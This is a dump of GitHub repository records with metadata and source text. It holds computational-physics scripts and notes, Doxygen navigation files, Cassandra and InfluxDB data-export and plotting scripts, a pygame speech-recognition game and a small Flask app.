href=\"http://www.codecogs.com/eqnedit.php?latex=T=10000,dt=0.1,$N_{A0}=10$,$N_{B0}=10$,$\\tau_A=1000$,$\\tau_B=1$($\\tau_A$/$\\tau_B$>>1):\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?T=10000,dt=0.1,$N_{A0}=10$,$N_{B0}=10$,$\\tau_A=1000$,$\\tau_B=1$($\\tau_A$/$\\tau_B$>>1):\" title=\"T=10000,dt=0.1,$N_{A0}=10$,$N_{B0}=10$,$\\tau_A=1000$,$\\tau_B=1$($\\tau_A$/$\\tau_B$>>1):\" /></a>\n\n![4](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/fig4.png)\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=T=10000,dt=0.1,$N_{A0}=10$,$N_{B0}=0$,$\\tau_A=1000$,$\\tau_B=1$($\\tau_A$/$\\tau_B$>>1):\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?T=10000,dt=0.1,$N_{A0}=10$,$N_{B0}=0$,$\\tau_A=1000$,$\\tau_B=1$($\\tau_A$/$\\tau_B$>>1):\" title=\"T=10000,dt=0.1,$N_{A0}=10$,$N_{B0}=0$,$\\tau_A=1000$,$\\tau_B=1$($\\tau_A$/$\\tau_B$>>1):\" /></a>\n![3](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/fig3.png)\n\n结论2:\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$\\tau_A$/$\\tau_B$>>1\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$\\tau_A$/$\\tau_B$>>1\" title=\"$\\tau_A$/$\\tau_B$>>1\" /></a>时,B先增多后减少,随时间增大\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$\\tau_A$/$\\tau_B$<<1\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$\\tau_A$/$\\tau_B$<<1\" title=\"$\\tau_A$/$\\tau_B$<<1\" /></a>时,A迅速减少,B迅速增加再逐渐衰变减少\n" }, { "alpha_fraction": 0.46236559748649597, "alphanum_fraction": 0.5199692845344543, "avg_line_length": 23.129629135131836, "blob_id": "de6587e24e614a9e277ca95f33a03eadff2d1ad4", "content_id": "dd5fea44733c8d76dbcd61fd066b1d28f31785d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1302, "license_type": "no_license", "max_line_length": 115, "num_lines": 54, "path": "/ch3.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport math\ng=9.8\ndef Trajectory(v,w,theta):\n velocity_x=[v]\n velocity_y=[0]\n velocity_z=[0]\n dt=0.01\n x=[0]\n y=[10]\n z=[0] \n i=0\n y_dt=1\n while y_dt>0 :\n theta=theta+w*dt\n F_lateral=0.5*g*(math.sin(4*theta)-0.25*math.sin(8*theta)+0.08*math.sin(12*theta)-0.025*math.sin(16*theta))\n vxi=velocity_x[i]\n vyi=velocity_y[i]\n vzi=velocity_z[i] \n v=math.sqrt(vxi**2+vyi**2+vzi**2)\n B=0.0039+0.0058/(1+math.exp((v-35)/5))\n vx_dt=vxi-B*v*vxi*dt+F_lateral*math.sin(theta)\n vy_dt=vyi-B*v*vyi*dt-g*dt\n vz_dt=vzi-B*v*vzi*dt+F_lateral*math.cos(theta)-4.1*10**(-4)*vxi*w\n x_dt=x[i]+vxi*dt\n y_dt=y[i]+vyi*dt\n z_dt=z[i]+vzi*dt\n if y_dt<0:\n r=-y[-1]/y_dt\n x_dt=(x[-1]+r*x_dt)/(r+1)\n y_dt=0\n range=x_dt\n x.append(x_dt)\n y.append(y_dt)\n z.append(z_dt)\n velocity_x.append(vx_dt)\n velocity_y.append(vy_dt)\n velocity_z.append(vz_dt)\n i=i+1\n return x,y,z,range\n\n\n\n\n\nplt.xlabel('x/m')\nplt.ylabel('y/m')\nfor i in range(11):\n t=Trajectory(5*i,math.pi/3,math.pi/2)\n plt.plot(t[0],t[1],label=5*i)\n#plt.xlim(0,180)\nplt.title('x-y,v=50m/s,w=pi/3')\nplt.legend()\nplt.show()" }, { "alpha_fraction": 0.5163853168487549, "alphanum_fraction": 0.7090367674827576, "avg_line_length": 34.96428680419922, "blob_id": "b450b411087795962a088f0412dd85f70dbb2ddd", "content_id": "2d399099d7d8ef5f27efa1465414b57070245459", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1047, "license_type": "no_license", "max_line_length": 118, "num_lines": 28, "path": "/a simple one.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "Different levels of Koch curve can be obtained by this code\n```import turtle as t\ndef koch(level, size):\n if level == 0:\n t.forward(size)\n return\n else:\n for angle in [60, -120, 60, 0]:\n koch(level-1, size/3)\n t.left(angle)\n\nt.hideturtle()\nt.up()\nt.setx(-t.window_width()/2)\nt.down()\nt.speed(0)\n\nkoch(5,t.window_width())\n\nt.exitonclick() \n```\n\nset level= 1,2,3,4,5\n![1](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/屏幕快照%202017-12-31%2016.54.53.png)\n![2](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/屏幕快照%202017-12-31%2016.55.12.png)\n![3](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/屏幕快照%202017-12-31%2016.55.29.png)\n![4](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/屏幕快照%202017-12-31%2016.56.19.png)\n![5](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/屏幕快照%202017-12-31%2016.57.24.png)\n" } ]
33
NeilZP/Flask-UI5
https://github.com/NeilZP/Flask-UI5
ca9e078bc32824e0ef0b21dae2f70ea50e3a72fc
dfced03405c93ae09316a3b60d078f7d0802510d
9f21da73265e0aa6063e0156c34c03dddf155028
refs/heads/master
2021-01-22T07:27:38.729411
2017-02-13T15:25:52
2017-02-13T15:25:52
81,823,897
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5476550459861755, "alphanum_fraction": 0.5673222541809082, "avg_line_length": 28.909090042114258, "blob_id": "ba5e0467d24c0a18d9e0698db765022408bf49ea", "content_id": "6c9de936cb99f19d049dbe4c4e4992c48e356b14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 661, "license_type": "no_license", "max_line_length": 56, "num_lines": 22, "path": "/hello-flask.py", "repo_name": "NeilZP/Flask-UI5", "src_encoding": "UTF-8", "text": "from flask import Flask,render_template,jsonify\napp= Flask(__name__)\n# @app.route('/')\[email protected]('/hello/') \[email protected]('/hello/<name>') \ndef hello(name=None):\n\t# Test1 Begin\n # response = \"<html>\\n\"\n # response += \"<title>Flask Test</title>\\n\"\n # response += \"<body>\\n\"\n # response += \"<h2>Hello World\\n</h2>\"\n # response += \"</body>\\n\"\n # response += \"</html>\\n\"\n # return response\n # Test1 End\n # return render_template(\"hello.html\") #Test 2\n if name == None: \n name = \"Neilzp_20170213\" \n templateDate = {'name' : name}; \n return render_template(\"hello.html\", **templateDate)\n\nif __name__ == '__main__': \n\n" } ]
1
MD2Korg/Cerebral-Cortex-Data-Analysis-Tools
https://github.com/MD2Korg/Cerebral-Cortex-Data-Analysis-Tools
fd9b64a5ce3b63a66ae876b4dd00f0d3ed0f7e15
26813a63ceac645ab9f240bb1ec7aad4c847690a
a98a23fa4d12e8bc4cd7778d94b98f3eced35bc3
refs/heads/master
2021-01-22T19:42:44.923684
2018-07-27T18:58:18
2018-07-27T18:58:18
85,234,626
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6608761548995972, "alphanum_fraction": 0.6674848794937134, "avg_line_length": 32.9487190246582, "blob_id": "c7c27da46fde35a7fa6e549386b7c0350935cd68", "content_id": "e6e6b4d754aa4463465219469fcf85e506b34c96", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5296, "license_type": "permissive", "max_line_length": 225, "num_lines": 156, "path": "/python/cluster/participantDataDump.py", "repo_name": "MD2Korg/Cerebral-Cortex-Data-Analysis-Tools", "src_encoding": "UTF-8", "text": "import argparse\nimport bz2\nimport csv\nimport datetime\nimport json\nimport multiprocessing\nimport os\n\nimport psycopg2\nfrom cassandra.cluster import Cluster\nfrom joblib import Parallel, delayed\n\nparser = argparse.ArgumentParser(description='Export datastreams from the Cerebral Cortex Cassandra store.')\n\nparser.add_argument('--server', help='Cassandra server to connect with', required=True)\nparser.add_argument('--keyspace', help='Cassandra keyspace', required=True)\nparser.add_argument('--path', help='Base filesystem path', required=True)\nparser.add_argument('--participant', help='Participant UUID', required=True)\nparser.add_argument('--startday', help='Day string representing the first day to begin scanning for data',\n required=True)\nparser.add_argument('--endday', help='Day string representing the day to end scanning for data', required=True)\n\nargs = parser.parse_args()\n\n# Setup Variables\nfilepath = args.path\n\nstartday = args.startday\nendday = args.endday\n\nstartyear = int(startday[:4])\nstartmonth = int(startday[4:6])\nstartday = int(startday[6:])\n\nendyear = int(endday[:4])\nendmonth = int(endday[4:6])\nendday = int(endday[6:])\n\nstartdate = datetime.date(startyear, startmonth, startday)\nenddate = datetime.date(endyear, endmonth, endday)\n\nepoch = datetime.datetime.utcfromtimestamp(0)\n\n\ndef getDatastreamIDs(identifier):\n conn = psycopg2.connect(\"dbname=\" + args.keyspace + \" user=cerebralcortex\")\n cur = conn.cursor()\n\n searchStmt = 'select datastreams.id, datastreams.participant_id, datasources.identifier, datasources.datasourcetype, m_cerebrum_applications.identifier, m_cerebrum_platforms.identifier, m_cerebrum_platforms.platformtype '\n searchStmt += 'from datastreams inner join datasources on datasources.id=datastreams.datasource_id '\n searchStmt += 'inner join m_cerebrum_applications on m_cerebrum_applications.id=datasources.m_cerebrum_application_id '\n searchStmt += 'inner join m_cerebrum_platforms on m_cerebrum_platforms.id=datasources.m_cerebrum_platform_id '\n searchStmt += 'where datastreams.participant_id=\\'' + args.participant + '\\''\n\n datastreams = []\n cur.execute(searchStmt)\n results = cur.fetchall()\n for i in results:\n datastreams.append(i)\n\n cur.close()\n conn.close()\n\n return datastreams\n\n\ndef daterange(start_date, end_date):\n for n in range(int((end_date - start_date).days)):\n yield start_date + datetime.timedelta(n)\n\n\ndef flatten(structure, key=\"\", path=\"\", flattened=None):\n if flattened is None:\n flattened = {}\n if type(structure) not in (dict, list):\n flattened[((path + \"_\") if path else \"\") + key] = structure\n elif isinstance(structure, list):\n for i, item in enumerate(structure):\n flatten(item, \"%d\" % i, \"_\".join(filter(None, [path, key])), flattened)\n else:\n for new_key, value in structure.items():\n flatten(value, new_key, \"_\".join(filter(None, [path, key])), flattened)\n return flattened\n\n\ndef unix_time_millis(dt):\n return (dt - epoch).total_seconds() * 1000.0\n\n\ndef rowProcessor(r):\n row = []\n row.append(int(unix_time_millis(r.datetime)))\n # row.append(r.datetime)\n row.append(r.offset)\n\n json_parsed = json.loads(r.sample)\n for j in json_parsed:\n val = ''\n if type(j) is dict:\n val = json.dumps(j).encode('utf8')\n else:\n val = j\n row.append(val)\n\n return row\n\n\ndef extractDataStream(datastream):\n segment_char = '+'\n\n dsid = str(datastream[0])\n participantid = str(datastream[1])\n datasource_id = str(datastream[2])\n datasource_type = str(datastream[3])\n app_id = str(datastream[4])\n platform_id = str(datastream[5])\n platform_type = str(datastream[6])\n\n cluster = Cluster([args.server])\n\n session = cluster.connect(args.keyspace)\n\n if not os.path.exists(filepath + '/' + participantid):\n os.mkdir(filepath + '/' + participantid)\n\n filename_base = filepath + '/' + participantid + '/' + participantid + segment_char + dsid + segment_char + app_id + segment_char + datasource_type\n if datastream[2] is not None:\n filename_base += segment_char + datasource_id\n if datastream[6] is not None:\n filename_base += segment_char + platform_type\n if datastream[5] is not None:\n filename_base += segment_char + platform_id\n\n with bz2.BZ2File(filename_base + '.csv.bz2', 'w') as csvfile:\n outputwriter = csv.writer(csvfile, delimiter=',', quotechar=\"'\")\n for day in daterange(startdate, enddate):\n yyyymmdd = day.strftime('%Y%m%d')\n\n stmt = 'SELECT datetime, offset, sample FROM rawdata where datastream_id=' + dsid + ' and day=\\'' + yyyymmdd + '\\''\n rows = session.execute(stmt, timeout=180.0)\n flag = False\n for r in rows:\n flag = True\n outputwriter.writerow(rowProcessor(r))\n\n if flag:\n print('COMPLETED: ' + stmt)\n\n return True\n\n\nif __name__ == \"__main__\":\n num_cores = multiprocessing.cpu_count()\n datastreams = getDatastreamIDs(args.participant)\n results = Parallel(n_jobs=num_cores)(delayed(extractDataStream)(i) for i in datastreams)\n print(\"Complete: \" + str(len(results)) + \" datastreams exported\")\n" }, { "alpha_fraction": 0.7827585935592651, "alphanum_fraction": 0.7965517044067383, "avg_line_length": 47.5, "blob_id": "e16ce72ef92f72a68a342b672c7325e751603068", "content_id": "e6fa14b6a3ca73ec3c65782b7f0b7acc2c420169", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 290, "license_type": "permissive", "max_line_length": 120, "num_lines": 6, "path": "/python/README.md", "repo_name": "MD2Korg/Cerebral-Cortex-Data-Analysis-Tools", "src_encoding": "UTF-8", "text": "# Python Tools\n\n1. **temporalplot.py**: Renders export from the participantDataDump tool based on participant UUID and an optional time \nrange\n1. **participantDataDump.py**: Responsible for extracting all datastreams from Cerebral Cortex(0.1.x) and saving them \nas bzip compressed CSV files" }, { "alpha_fraction": 0.5162271857261658, "alphanum_fraction": 0.5309330821037292, "avg_line_length": 30.30158805847168, "blob_id": "a4ff13ac63c4a825a04643648518edff95641988", "content_id": "e4496fc3cce6ef55f1b235df14ffa4351e3e212e", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1972, "license_type": "permissive", "max_line_length": 97, "num_lines": 63, "path": "/python/influx-insert.py", "repo_name": "MD2Korg/Cerebral-Cortex-Data-Analysis-Tools", "src_encoding": "UTF-8", "text": "from influxdb import InfluxDBClient\nimport glob\nimport os\nimport bz2\nfrom pprint import pprint\nimport multiprocessing\nfrom joblib import Parallel, delayed\nimport sys\n\ndb = 'rice'\n\ndef parseFile(f):\n client = InfluxDBClient('localhost', 8086, '', '', db)\n client.create_database(db)\n data = []\n basename = os.path.basename(f)[:-8]\n uuid, ds_id, app, identifier = basename.split('+', 3)\n print(uuid, app)\n print(identifier)\n try:\n with bz2.open(f, 'rt') as input_file:\n for l in input_file:\n ts, offset, values = l.rstrip().split(',', 2)\n ts = int(ts)*1000000\n\n data_values = values.split(',')\n object = {}\n object['measurement'] = identifier\n object['tags'] = {'owner': uuid, 'application': app}\n object['time'] = ts\n try:\n sample = map(float,data_values)\n object['fields'] = {}\n for i, s in enumerate(sample):\n object['fields']['value_'+str(i)] = s\n except :\n object['fields'] = {'value': values}\n\n data.append(object)\n if len(data) >= 1000000:\n print('Yielding:', uuid, len(data), identifier)\n client.write_points(data)\n data = []\n\n\n except ValueError as e:\n print(\"Value Error: \", e, basename)\n client.write_points(data)\n return True\n\n\nif __name__=='__main__':\n num_cores = multiprocessing.cpu_count()\n files = glob.glob(db + '/' + sys.argv[1] + '*/*.bz2')\n\n\n sizes = [ (filename, os.stat(filename).st_size) for filename in files ]\n sizes.sort(key=lambda tup: tup[1])\n\n #for f in files:\n # parseFile(f)\n results = Parallel(n_jobs=num_cores-4, verbose=11)(delayed(parseFile)(f) for f,size in sizes)\n print(\"Complete: \" + str(len(results)) + \" datastreams exported\")\n" }, { "alpha_fraction": 0.5716360211372375, "alphanum_fraction": 0.5902710556983948, "avg_line_length": 34.93043518066406, "blob_id": "123179e83b54badf375d1bd16c706494d2bff73c", "content_id": "6e37e3bfde1cb2afc3931d550fd6987bae45ecc0", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4132, "license_type": "permissive", "max_line_length": 120, "num_lines": 115, "path": "/python/temporalplot.py", "repo_name": "MD2Korg/Cerebral-Cortex-Data-Analysis-Tools", "src_encoding": "UTF-8", "text": "import argparse as argparse\nimport bz2\nimport datetime\nimport glob\nfrom pprint import pprint\n\nimport matplotlib.collections as col\nimport matplotlib.dates as dates\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef process_data(data):\n x = np.array(data)\n delta = np.diff(x)\n i = np.where(delta > 300 * 1000)\n return np.vstack((x[i], x[i] + delta[i])).T\n\n\ndef process(participant, directory, filter_string='', start_day=None, end_day=None):\n offset = 0\n lines = []\n gst = 1e100\n get = 0\n labels = []\n for f in glob.glob(directory + '/' + participant + filter_string + '.bz2'):\n print(f)\n params = f[:-16].split('+')[3:]\n labels.append('__'.join(params))\n offset += 1\n with bz2.open(f, 'rt') as csvFile:\n data = []\n for l in csvFile.readlines():\n items = l.split(',')\n ts = int(items[0])\n if start_day is not None and end_day is not None:\n if ts < start_day or end_day < ts:\n continue\n\n data.append(ts)\n\n if ts < gst:\n gst = ts\n if ts > get:\n get = ts\n\n blocks = process_data(data)\n if len(blocks) > 0:\n pprint(blocks)\n for segment in blocks:\n lines.append([(dates.date2num(datetime.datetime.utcfromtimestamp(segment[0] / 1000.0)), offset),\n (\n dates.date2num(datetime.datetime.utcfromtimestamp(segment[1] / 1000.0)), offset)])\n\n return lines, offset, labels, gst, get\n\n\ndef render(lines, offset, labels, st, et):\n lc = col.LineCollection(lines)\n fig, ax = plt.subplots()\n ax.add_collection(lc)\n ax.xaxis.set_major_locator(dates.DayLocator())\n ax.xaxis.set_major_formatter(dates.DateFormatter('%D'))\n ax.xaxis.set_minor_locator(dates.HourLocator(np.arange(6, 25, 6)))\n ax.xaxis.set_minor_formatter(dates.DateFormatter('%H'))\n\n fig.subplots_adjust(left=.25, right=.99, top=.99)\n\n plt.xlim([dates.date2num(datetime.datetime.utcfromtimestamp(st / 1000.0)),\n dates.date2num(datetime.datetime.utcfromtimestamp(et / 1000.0))])\n plt.ylim([0, offset + 1])\n plt.yticks(range(1, offset + 1), labels)\n plt.xticks(rotation=90)\n\n plt.show()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Export processor for Cerebral Cortex Data Dumps')\n\n parser.add_argument('--data_directory', help='Data Directory', required=True)\n parser.add_argument('--participant', help='Participant UUID', required=True)\n parser.add_argument('--filter', help='Filter String', default='*', required=False)\n parser.add_argument('--start_day', help='Day string representing the first day to begin scanning for data',\n required=False)\n parser.add_argument('--end_day', help='Day string representing the day to end scanning for data', required=False)\n\n args = parser.parse_args()\n\n participant = args.participant\n data_dir = args.data_directory\n filter = args.filter\n\n if args.start_day and args.end_day:\n print('HERE')\n start_day = args.start_day\n end_day = args.end_day\n\n start_year = int(start_day[:4])\n start_month = int(start_day[4:6])\n start_day = int(start_day[6:])\n\n end_year = int(end_day[:4])\n end_month = int(end_day[4:6])\n end_day = int(end_day[6:])\n\n epoch = datetime.datetime.utcfromtimestamp(0)\n start_date = int((datetime.datetime(start_year, start_month, start_day) - epoch).total_seconds() * 1e3)\n end_date = int((datetime.datetime(end_year, end_month, end_day) - epoch).total_seconds() * 1e3)\n\n lines, offset, labels, gst, get = process(participant, data_dir, filter_string=filter, start_day=start_date,\n end_day=end_date)\n else:\n lines, offset, labels, gst, get = process(participant, data_dir, filter_string=filter)\n render(lines, offset, labels, gst, get)\n" }, { "alpha_fraction": 0.6363636255264282, "alphanum_fraction": 0.7818182110786438, "avg_line_length": 13, "blob_id": "4dff1cf6499360793287e0da826ce1e69035d094", "content_id": "b3891aa012292cd3c04c79fef5f8dea0e83ffddf", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 55, "license_type": "permissive", "max_line_length": 23, "num_lines": 4, "path": "/python/cluster/requirements.txt", "repo_name": "MD2Korg/Cerebral-Cortex-Data-Analysis-Tools", "src_encoding": "UTF-8", "text": "cassandra-driver==3.2.1\njoblib\npathlib2\npsycopg2==2.6.2" } ]
5
tech-and-me/speech_recognition
https://github.com/tech-and-me/speech_recognition
7539a0e57de305ebe75e2505a6410599c22b361f
b1a500682e7cafa97322f18b2de4f4e61effde79
a3f69963f067fb5d6e4d51489efe2eae635d5b04
refs/heads/main
2023-01-05T03:09:14.464497
2020-11-08T08:44:20
2020-11-08T08:44:20
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4765578508377075, "alphanum_fraction": 0.4884273111820221, "avg_line_length": 30.185184478759766, "blob_id": "f526ec532325e497ecd093bd0026184c9e81130b", "content_id": "4766bd9b52ce2fab4b0230d132bdc02149ecb37e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1685, "license_type": "no_license", "max_line_length": 60, "num_lines": 54, "path": "/speech_pygame.py", "repo_name": "tech-and-me/speech_recognition", "src_encoding": "UTF-8", "text": "import pygame\nimport os\nfrom glob import glob\nimport time\nimport speech_recognition as sr\nfrom random import shuffle\n\ngameDisplay = pygame.display.set_mode((400, 400))\n\npngs = [x for x in glob(\"animals\\\\*.PNG\")]\nnames = [x.split(\".\")[0] for x in glob(\"animals\\\\*.PNG\")]\n\nanimals = {k:v for k, v in zip(pngs, names)}\nprint(animals)\n\n\nprint(pngs)\nprint(names)\nfor n, animals in enumerate(pngs):\n guess_counter = 0\n carImg = pygame.image.load(os.path.join('', animals))\n gameDisplay.blit(carImg,(130,0))\n pygame.display.update()\n # pygame.mixer.Sound.play(Tiger)\n # pygame.mixer.music.stop()\n # time.sleep(1)\n for j in range(1,4):\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print ('What\\'s his name!')\n audio = r.listen(source)\n try:\n text = r.recognize_google(audio)\n print(text)\n except:\n print('Did not get that try Again')\n text=''\n if text == names[n].split(\"\\\\\")[1]:\n print('good job\\n=========\\n\\n') \n #pygame.mixer.Sound.play(right)\n # pygame.mixer.music.stop()\n break\n else:\n if guess_counter < 3:\n print('wrong try again')\n # pygame.mixer.Sound.play(wrong)\n # pygame.mixer.music.stop()\n # time.sleep(1)\n guess_counter += 1\n else:\n print(\"\\nSorry no more chances\\n\\n\")\n time.sleep(1)\n\npygame.quit()\n\n" } ]
1
morgatron/spcpt-analysis
https://github.com/morgatron/spcpt-analysis
b3405d9ab05de45371ae2f436269996a5b0e4af6
432708cf2b6104fb6fa2e9eb83aff3033db4ff01
0705ac9a8272929a7aa68878b87b6c2cf48e7c05
refs/heads/master
2016-09-03T07:30:56.797985
2015-01-31T18:32:59
2015-01-31T18:32:59
30,121,467
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6538461446762085, "alphanum_fraction": 0.7596153616905212, "avg_line_length": 51, "blob_id": "d0e41c18b33bd29c1136799385a17af7775aa5e6", "content_id": "1897158892cee7324f74df55e14440462c96e05e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 208, "license_type": "no_license", "max_line_length": 186, "num_lines": 4, "path": "/html/search/variables_5.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n ['labsetdata',['LabSetData',['../namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1SPfuncs.html#a98ebdcd3ceb3fa1b7bc74e8caf64b50d',1,'repo::programs::pythonpackages::pr::SPfuncs']]]\n];\n" }, { "alpha_fraction": 0.4838709533214569, "alphanum_fraction": 0.6881720423698425, "avg_line_length": 22.5, "blob_id": "262afe90f854bcba92c3d7a0ee76182add2226a6", "content_id": "c179abc46fe2d2d67d02f2850fc2be472d5e669f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 93, "license_type": "no_license", "max_line_length": 72, "num_lines": 4, "path": "/html/scrap_8py.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var scrap_8py =\n[\n [ \"test\", \"scrap_8py.html#aceae244c0ee91c8c30885ebb02f12c7e\", null ]\n];" }, { "alpha_fraction": 0.6266666650772095, "alphanum_fraction": 0.6266666650772095, "avg_line_length": 18, "blob_id": "5ae6b6fd4baa231316e66137beff7847deac8759", "content_id": "7345363a98ceac07c70d4b130d72f317d3928181", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 75, "license_type": "no_license", "max_line_length": 53, "num_lines": 4, "path": "/html/namespaces.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var namespaces =\n[\n [ \"repo\", \"namespacerepo.html\", \"namespacerepo\" ]\n];" }, { "alpha_fraction": 0.5495250821113586, "alphanum_fraction": 0.5807327032089233, "avg_line_length": 48.20000076293945, "blob_id": "eb8ccee97732106dce9492f59dff1a959855cda3", "content_id": "7f191a99181cda3747c6a3529cb74f99ce7721f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 737, "license_type": "no_license", "max_line_length": 72, "num_lines": 15, "path": "/html/files.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var files =\n[\n [ \"__init__.py\", \"____init_____8py.html\", null ],\n [ \"convert.py\", \"convert_8py.html\", \"convert_8py\" ],\n [ \"getSPdata.py\", \"getSPdata_8py.html\", \"getSPdata_8py\" ],\n [ \"loadSPFiles.py\", \"loadSPFiles_8py.html\", \"loadSPFiles_8py\" ],\n [ \"openCPT.py\", \"openCPT_8py.html\", \"openCPT_8py\" ],\n [ \"openMotor.py\", \"openMotor_8py.html\", \"openMotor_8py\" ],\n [ \"scrap.py\", \"scrap_8py.html\", \"scrap_8py\" ],\n [ \"sdtime.py\", \"sdtime_8py.html\", \"sdtime_8py\" ],\n [ \"SPDataSet.py\", \"SPDataSet_8py.html\", \"SPDataSet_8py\" ],\n [ \"SPfuncs.py\", \"SPfuncs_8py.html\", \"SPfuncs_8py\" ],\n [ \"SPgraphs.py\", \"SPgraphs_8py.html\", \"SPgraphs_8py\" ],\n [ \"test_SPfuncs.py\", \"test__SPfuncs_8py.html\", \"test__SPfuncs_8py\" ]\n];" }, { "alpha_fraction": 0.5663265585899353, "alphanum_fraction": 0.6581632494926453, "avg_line_length": 55, "blob_id": "8cc0ae5099ff8160ed25074bc1de3e5703ebb996", "content_id": "e3b60c3c9af58a7f34f72fff359505fe9fc72bc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 392, "license_type": "no_license", "max_line_length": 183, "num_lines": 7, "path": "/html/search/all_b.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var searchData=\n[\n ['object',['object',['../classobject.html',1,'']]],\n ['opencpt_2epy',['openCPT.py',['../openCPT_8py.html',1,'']]],\n ['openfile',['openFile',['../namespacerepo_1_1programs_1_1pythonpackages_1_1pr_1_1openCPT.html#a123c419a688aefb0d6d482eca7512d36',1,'repo::programs::pythonpackages::pr::openCPT']]],\n ['openmotor_2epy',['openMotor.py',['../openMotor_8py.html',1,'']]]\n];\n" }, { "alpha_fraction": 0.5008272528648376, "alphanum_fraction": 0.7445048689842224, "avg_line_length": 78.84906005859375, "blob_id": "cac8c01e044f6d22581611bf0ed9fb9f77b8e0d4", "content_id": "6a18e5dd45d921eb872429e7b9c3c7c55d32a708", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4231, "license_type": "no_license", "max_line_length": 98, "num_lines": 53, "path": "/html/SPfuncs_8py.js", "repo_name": "morgatron/spcpt-analysis", "src_encoding": "UTF-8", "text": "var SPfuncs_8py =\n[\n [ \"addFakeData\", \"SPfuncs_8py.html#a9cc828a26b8f8d72c9c5c86bd951f8e8\", null ],\n [ \"combine_angle_amps\", \"SPfuncs_8py.html#adb6ea3b115ad55320acf0ef8f3ee76eb\", null ],\n [ \"filterBySensors\", \"SPfuncs_8py.html#aefa37b595edec764011c69c3202787f6\", null ],\n [ \"getAnglesFromRSpec\", \"SPfuncs_8py.html#a2533afa952ea007cfad4a1deb6a607a5\", null ],\n [ \"getHarmonicsFit\", \"SPfuncs_8py.html#a7590e0785adc48ccbabea8d0eccda514\", null ],\n [ \"getRotationsFromRSpec\", \"SPfuncs_8py.html#aba724f914a5cc838851518564a1f5d84\", null ],\n [ \"group_by_axis\", \"SPfuncs_8py.html#a5a727d85f97fb1e1e7370fbca3b1d1ea\", null ],\n [ \"makeTestData\", \"SPfuncs_8py.html#ae90ba18ae292290722e197cf242d8721\", null ],\n [ \"makeTriggers\", \"SPfuncs_8py.html#af8a48b74a6d4e725e2409329126076a6\", null ],\n [ \"mgStringHarmonics\", \"SPfuncs_8py.html#a154be474c56db17750f8232efe410d54\", null ],\n [ \"preprocess_raw\", \"SPfuncs_8py.html#aa45dbb6291e4944f3ba2718a3d0ee001\", null ],\n [ \"process_continuous_raw\", \"SPfuncs_8py.html#a9ae89d50fa931a7cc863400505be38b1\", null ],\n [ \"process_points\", \"SPfuncs_8py.html#a7265a1148ca13e5fb7961b297a214d13\", null ],\n [ \"process_raw\", \"SPfuncs_8py.html#a5d91f2e7930fdc007f010659068307f9\", null ],\n [ \"process_sequences\", \"SPfuncs_8py.html#a98d08fa254a21b0b0895f424f7006dbd\", null ],\n [ \"process_sequences_multifit\", \"SPfuncs_8py.html#aa986fff9d1f1b5354e43e972289e5844\", null ],\n [ \"renameFieldMaybe\", \"SPfuncs_8py.html#acb6d178d4325b6c3d8fec4f8197d6819\", null ],\n [ \"rotate_sequence_amps\", \"SPfuncs_8py.html#a792112113be3784fc089059c6eed4ff1\", null ],\n [ \"sd2secs\", \"SPfuncs_8py.html#aca5c571c3ee666190d0568fbcd72f1a9\", null ],\n [ \"secs2sd\", \"SPfuncs_8py.html#a9d03b1e8bb9325cdab8fa026d6cdbbe3\", null ],\n [ \"sliceReduceData\", \"SPfuncs_8py.html#afac5173c60ef10bac3b5eafb40f7efef\", null 